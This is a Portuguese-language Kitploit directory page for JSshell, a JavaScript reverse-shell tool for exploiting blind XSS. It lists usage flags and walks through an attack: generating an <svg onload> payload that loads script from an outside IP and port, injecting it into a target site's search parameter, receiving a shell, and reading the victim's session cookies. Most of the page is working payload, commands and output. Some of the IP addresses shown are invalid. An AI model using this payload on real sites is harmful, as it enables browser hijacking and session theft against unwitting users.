Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
JSshell — JSshell - shell JavaScript reverso/remoto | Kitploit
Ferramentas/GitHubGitHub/shelld3v/jsshell
Geração de PayloadsExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubshelld3v/jsshell

JSshell

JSshell - shell JavaScript reverso/remoto

Ver Repositório
631110há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

JSshell - versão 3.1

JSshell

JSshell - um reverse shell JavaScript. Isso é usado para executar código JS remotamente, explorando XSS cego, ...

Requisitos: Qualquer SO + Python 2 ou Python 3

Novidades na versão 3.1 do JSshell

Atualizado na nova versão do JShell 3.1:

  • Novo comando JSshell: snippet -> permite escrever um trecho de código javascript
root@kitploit:~
>>> snippet
Use CTRL+D to finish the snippet

function new() {
    new = 'New update: Support javascript snippet =)';
    confirm(new)
}

new()
>>> 
  • Modo silencioso (para profissionais)
  • Adicionado payload de reverse shell <body>
  • Corrigidos alguns bugs

Uso

Gerar payloads de JS reverse shell: -g

Definir o número da porta local para escuta e geração de payloads (Padrão: 4848): -p

Definir o endereço de origem local para geração de payloads (Padrão: detectar automaticamente seu endereço IP): -s

Definir timeout para a conexão do shell (se o usuário sair da sessão, o shell ficará pausado para sempre, então se você definir o timeout, o shell será fechado após exceder o timeout): -w

Executar um comando após obter o shell: -c

Exemplos de uso:

  • jsh.py
  • jsh.py -g
  • jsh.py -p 1234
  • jsh.py -s 48.586.1.23 -g
  • jsh.py -c "alert(document.cookie)" -w 10

Um exemplo de execução do JSshell:

Este é um exemplo passo a passo de como usar o JSshell.

Primeiro, precisamos gerar um payload de reverse JS shell e definir o timeout do shell (por exemplo, 20 segundos):

root@kitploit:~
~# whoami
root
~# ls
README.md   jsh.py
~# python3 jsh.py -g -w 20
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...

Agora cole este payload no site:

https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>

Acesse a página e teremos o reverse JS shell:

root@kitploit:~
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
exit, quit            Exit the JS shell
$

Vamos executar alguns comandos:

root@kitploit:~
$ var test = 'controlled'
$ confirm(test)
$

E um alerta será exibido: controlled

root@kitploit:~
$ prompt(document.cookie)
$

E o navegador exibirá os cookies do usuário: JSESSION=3bda8...

root@kitploit:~
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#

Agora saiu!

Autor

Isso foi criado por shelld3v!

Baixar ferramenta